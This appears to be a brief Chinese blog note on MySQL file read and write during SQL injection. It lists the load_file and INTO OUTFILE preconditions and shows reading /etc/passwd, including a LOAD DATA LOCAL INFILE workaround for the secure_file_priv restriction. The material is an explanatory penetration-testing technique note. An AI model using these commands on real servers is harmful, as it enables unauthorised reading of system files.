mysql读/写文件操作

参考:
https://blog.csdn.net/slip_666/article/details/79050454

1.通过load_file()函数将文件内容爆出来

前提条件

  1. 当前权限对该文件可读
  2. 文件在该服务器上
  3. 路径完整
  4. 文件大小小于max_allowed_packet
  5. 当前数据库用户有FILE权限
  6. secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作

2. 通过SELECT…INTO OUTFILE写文件

前提条件

  1. 目标目录要有可写权限
  2. 当前数据库用户要有FILE权限
  3. 目标文件不能已存在
  4. secure_file_priv的值为空
  5. 路径完整

找到sql注入的时候,想要读文件,发现

mysql> select load_file("/etc/passwd") into outfile "/tmp/passwd";
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

查看该值:

mysql> SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+

workarounds

于是可以新建一个表,或者直接把要读文件的内容into到已有的字符类型的表中。
参考:https://stackoverflow.com/a/40630313
http://www.runoob.com/mysql/mysql-create-tables.html

mysql> create table mytable(a VARCHAR(100), b VARCHAR(100), c VARCHAR(100), d VARCHAR(100), e VARCHAR(100), f VARCHAR(100), g VARCHAR(100));
Query OK, 0 rows affected (0.04 sec)

mysql> LOAD DATA LOCAL INFILE "/etc/passwd" INTO TABLE mytable;
Query OK, 33 rows affected, 198 warnings (0.01 sec)
Records: 33  Deleted: 0  Skipped: 0  Warnings: 198

mysql> select * from mytable;

mysql读/写文件操作_第1张图片
但是也有版本不支持:
在这里插入图片描述

你可能感兴趣的:(Web)